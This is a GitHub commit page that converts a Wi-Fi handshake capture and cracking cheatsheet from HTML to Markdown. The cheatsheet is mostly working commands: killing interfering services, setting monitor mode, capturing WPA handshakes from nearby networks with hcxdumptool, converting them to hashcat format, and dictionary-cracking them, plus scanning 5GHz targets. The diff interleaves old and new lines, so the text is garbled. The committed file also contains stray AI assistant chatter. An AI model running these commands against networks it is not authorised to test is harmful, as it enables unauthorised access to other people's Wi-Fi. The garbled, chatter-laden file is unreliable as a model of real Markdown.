Update Wi-Fi_handshake_capture_cheatsheet.md

main
$./Netrunner_& 11 months ago committed by GitHub
parent dcc8bfd6c4
commit 12a9eac6df
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -1,119 +1,159 @@
<!DOCTYPE html> Here is the HTML converted to Markdown for use on GitHub:
<html>
<head> ```markdown
<title>Wi-Fi Handshake Capture & Crack Cheatsheet</title> # Wi-Fi Handshake Capture & Crack Cheatsheet 📡
<style>
body { ## Table of Contents 📋
font-family: Arial, sans-serif;
} - [Preliminary Commands & Information Retrieval](#preliminary)
code { - [Capture & Conversion Phase](#capture)
background-color: #f4f4f4; - [Additional Scans & Information](#additional)
padding: 5px; - [Cracking Phase](#cracking)
} - [5GHz Network Capturing Cheat Sheet](#5ghz)
</style>
</head> ## Preliminary Commands & Information Retrieval 🛠
<body>
**Secure Copy from Remote Device**
<h1>Wi-Fi Handshake Capture & Crack Cheatsheet 📡</h1>
```
<h2>Table of Contents 📋</h2> scp -r root@172.16.42.1:/root/example.pcapng /home/username/Desktop
<ul> ```
<li><a href="#preliminary">Preliminary Commands & Information Retrieval</a></li>
<li><a href="#capture">Capture & Conversion Phase</a></li> 📖 Downloads files from remote devices using SCP.
<li><a href="#additional">Additional Scans & Information</a></li>
<li><a href="#cracking">Cracking Phase</a></li> **Check Wireless Interfaces**
<li><a href="#5ghz">5GHz Network Capturing Cheat Sheet</a></li>
</ul> ```
iwconfig
<h2 id="preliminary">Preliminary Commands & Information Retrieval 🛠</h2> ```
<ul>
<li><strong>Secure Copy from Remote Device</strong></li> 📖 Displays wireless network interface details.
<code>scp -r root@172.16.42.1:/root/example.pcapng /home/username/Desktop</code>
<p>📖 Downloads files from remote devices using SCP.</p> **Kill Interfering Services**
<!-- ... -->
<li><strong>Check Wireless Interfaces</strong></li> ```
<code>iwconfig</code> airmon-ng check kill
<p>📖 Displays wireless network interface details.</p> ```
<!-- ... -->
<li><strong>Kill Interfering Services</strong></li> 📖 Stops services that might interfere with wireless tools.
<code>airmon-ng check kill</code>
<p>📖 Stops services that might interfere with wireless tools.</p> ## Capture & Conversion Phase 🎯
</ul>
**Set Wireless Card to Monitor Mode**
<h2 id="capture">Capture & Conversion Phase 🎯</h2>
<ul> ```
<li><strong>Set Wireless Card to Monitor Mode</strong></li> sudo ip link set wlan0 down
<code>sudo ip link set wlan0 down</code> sudo iw wlan0 set monitor control
<code>sudo iw wlan0 set monitor control</code> sudo ip link set wlan0 up
<code>sudo ip link set wlan0 up</code> ```
<!-- ... -->
<p>📖 Prepares the wireless card for capture.</p> 📖 Prepares the wireless card for capture.
<!-- ... -->
<!-- ... --> **Capture Handshakes with hcxdumptool**
<li><strong>Capture Handshakes with hcxdumptool</strong></li>
<code>hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15</code> ```
<!-- ... --> hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15
<p>📖 Captures packets from networks.</p> ```
<!-- ... -->
<li><strong>Convert Captured File for Hashcat</strong></li> 📖 Captures packets from networks.
<code>hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng</code>
<p>📖 Converts packets for password cracking.</p> **Convert Captured File for Hashcat**
</ul>
```
<h2 id="additional">Additional Scans & Information 📡</h2> hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
<ul> ```
<li><strong>Scan for Nearby Networks</strong></li>
<code>hcxdumptool --do_rcascan -i wlan1</code> 📖 Converts packets for password cracking.
<p>📖 Scans and displays nearby networks.</p>
</ul> ## Additional Scans & Information 📡
<h2 id="cracking">Cracking Phase 🔐</h2> **Scan for Nearby Networks**
<ul>
<li><strong>Crack with Hashcat</strong></li> ```
<code>hashcat -m 22000 hash.hc22000 wordlist.txt</code> hcxdumptool --do_rcascan -i wlan1
<p>📖 Uses hashcat to attempt password cracks.</p> ```
</ul>
📖 Scans and displays nearby networks.
<h2 id="5ghz">5GHz Network Capturing Cheat Sheet 📶</h2>
<ul> ## Cracking Phase 🔐
<li><strong>1. Install Necessary Tools</strong></li>
<code>sudo apt-get install hcxdumptool hcxtools</code> **Crack with Hashcat**
<li><strong>2. Check for 5GHz Support</strong></li> ```
<code>iw list</code> hashcat -m 22000 hash.hc22000 wordlist.txt
```
<li><strong>3. Enable Monitor Mode</strong></li>
<code>sudo ip link set wlan0 down</code> 📖 Uses hashcat to attempt password cracks.
<code>sudo iw dev wlan0 set type monitor</code>
<code>sudo ip link set wlan0 up</code> ## 5GHz Network Capturing Cheat Sheet 📶
<li><strong>4. Set to 5GHz Channel</strong></li> 1. **Install Necessary Tools**
<code>sudo iw dev wlan0 set channel 36</code>
```
<li><strong>5. Identify Target Networks</strong></li> sudo apt-get install hcxdumptool hcxtools
<code>sudo hcxdumptool -i wlan0 --scan</code> ```
<li><strong>6. Capture Traffic</strong></li> 2. **Check for 5GHz Support**
<code>sudo hcxdumptool -i wlan0 --enable_status=1 -o output.pcapng --filterlist=filterlist.txt --filtermode=2</code>
```
<li><strong>7. Analyze Captured Traffic</strong></li> iw list
<code>hcxpcaptool -z output.hccapx output.pcapng</code> ```
<li><strong>8. Troubleshooting</strong></li> 3. **Enable Monitor Mode**
<code>sudo iw reg get</code>
<code>sudo iw reg set US</code> ```
sudo ip link set wlan0 down
<li><strong>9. Switch Back to 2.4GHz</strong></li> sudo iw dev wlan0 set type monitor
<code>sudo ip link set wlan0 down</code> sudo ip link set wlan0 up
<code>sudo iw dev wlan0 set type monitor</code> ```
<code>sudo iw dev wlan0 set channel 6</code>
<code>sudo ip link set wlan0 up</code> 4. **Set to 5GHz Channel**
<li><strong>10. List 2.4GHz Channels</strong></li> ```
<code>iw phy phy0 channels</code> sudo iw dev wlan0 set channel 36
<code>iwlist wlan0 channel</code> ```
</ul>
</ul> 5. **Identify Target Networks**
</body> ```
</html> sudo hcxdumptool -i wlan0 --scan
```
6. **Capture Traffic**
```
sudo hcxdumptool -i wlan0 --enable_status=1 -o output.pcapng --filterlist=filterlist.txt --filtermode=2
```
7. **Analyze Captured Traffic**
```
hcxpcaptool -z output.hccapx output.pcapng
```
8. **Troubleshooting**
```
sudo iw reg get
sudo iw reg set US
```
9. **Switch Back to 2.4GHz**
```
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo iw dev wlan0 set channel 6
sudo ip link set wlan0 up
```
10. **List 2.4GHz Channels**
```
iw phy phy0 channels
iwlist wlan0 channel
```
```
Let me know if you need any clarification or have additional requirements for the Markdown format!

Loading…
Cancel
Save